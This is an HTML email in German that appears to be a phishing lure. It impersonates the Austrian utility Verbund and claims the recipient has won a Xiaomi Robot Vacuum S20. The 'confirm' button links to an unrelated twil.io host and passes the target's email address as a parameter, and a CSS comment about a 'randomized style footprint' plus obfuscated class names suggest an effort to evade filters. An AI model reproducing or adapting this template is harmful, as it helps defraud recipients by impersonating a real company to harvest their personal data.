<!DOCTYPE html>
<html lang="de-AT">
<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Exklusive Benachrichtigung</title>
    <style>
        /* New randomized style footprint */
        body {
            background-color: #f0f2f5;
            margin: 0;
            padding: 40px 10px;
            font-family: 'Segoe UI', Arial, sans-serif;
        }

        .main-card-z9 {
            max-width: 440px;
            margin: 0 auto;
            background: #ffffff;
            border-radius: 16px;
            box-shadow: 0 10px 25px rgba(0,0,0,0.08);
            padding: 35px 20px;
            text-align: center;
        }

        .header-logo-w3 {
            width: 130px;
            margin-bottom: 30px;
        }

        .headline-red-k2 {
            color: #d32f2f;
            font-size: 24px;
            font-weight: 800;
            line-height: 1.2;
            margin-bottom: 15px;
            text-transform: uppercase;
        }

        .sub-header-v4 {
            font-size: 18px;
            color: #1c1e21;
            font-weight: 600;
            margin-bottom: 25px;
        }

        .product-wrap-m1 {
            background: radial-gradient(circle, #ffffff 0%, #f8f9fa 100%);
            padding: 20px;
            border-radius: 12px;
            margin-bottom: 20px;
        }

        .hero-asset-x8 {
            width: 100%;
            max-width: 240px;
            height: auto;
        }

        .description-p5 {
            color: #4b4f56;
            font-size: 15px;
            line-height: 1.6;
            margin-bottom: 30px;
            padding: 0 10px;
        }

        .action-link-t9 {
            display: block;
            background-color: #ee1d23;
            color: #ffffff !important;
            text-decoration: none;
            padding: 18px 20px;
            font-size: 18px;
            font-weight: bold;
            border-radius: 8px;
            transition: background 0.3s ease;
        }

        .footer-small-b1 {
            margin-top: 40px;
            font-size: 11px;
            color: #90949c;
        }

        .footer-small-b1 a {
            color: #90949c;
            text-decoration: underline;
        }
    </style>
</head>
<body>

    <div class="main-card-z9">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU60ZJZdBufnrcz3JU_Sz0eyWBN3KRzVzYdGXHBa4pa_ZJbFh2g9PY286l7fqqPp8EOMrjDJSbZEi2IvOjZEZJ8lfTzLIO2zTBlU7LPnkZ64lFvpLjFS8B87RJSAUbLvbTQ6HDN52Szf56dZU9XgJ9-jrU0uXVPo22TR0P4rJ8y_6GPr1omSxF29EN/s320/Verbund-group-logo.png" alt="Verbund" class="header-logo-w3">

        <h1 class="headline-red-k2">Herzlichen Glückwunsch!</h1>
        
        <div class="sub-header-v4">
            Ihr XIAOMI ROBOT VACUUM S20 wartet
        </div>

        <div class="product-wrap-m1">
            <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilj6wFZAzH8vPqrKBzFarxMtshAMFBdSHKrf2KooYbdEz-1Tb6urYD-aEjdAfcHk20CPICUGG_5U0yLywL88LHY9kHaItLiiFRvknDV8-HFJh0Hib_zPHEzT5M6Q1WkRKwd0wHd8N-8fP612DY8sXbkzJ1nITR4c61sT6AmVuIsE-AVUU64T3DaMwO/w318-h517/file_4059b0b5-463f-4e1c-8e70-6f7b80eedf75.png" alt="Xiaomi S20" class="hero-asset-x8">
        </div>

        <p class="description-p5">
            Sie wurden unter unseren Kunden für diese <strong>exklusive Sonderaktion</strong> ausgewählt. Greifen Sie jetzt zu und sichern Sie sich den modernen S20 Saugroboter. 
            <br><br>
            Bitte bestätigen Sie Ihre Angaben durch eine kurze Rückmeldung, um den Versandprozess einzuleiten.
        </p>

        <a href="https://verbund-7411.twil.io/index.html?email=python-apps-team@lists.alioth.debian.org" class="action-link-t9">
            JETZT BESTÄTIGEN
        </a>

        <div class="footer-small-b1">
            Diese E-Mail ist ein automatischer Service. <br>
            <a href="#">Hier klicken</a>, um keine weiteren Angebote zu erhalten.
        </div>
    </div>

</body>
</html>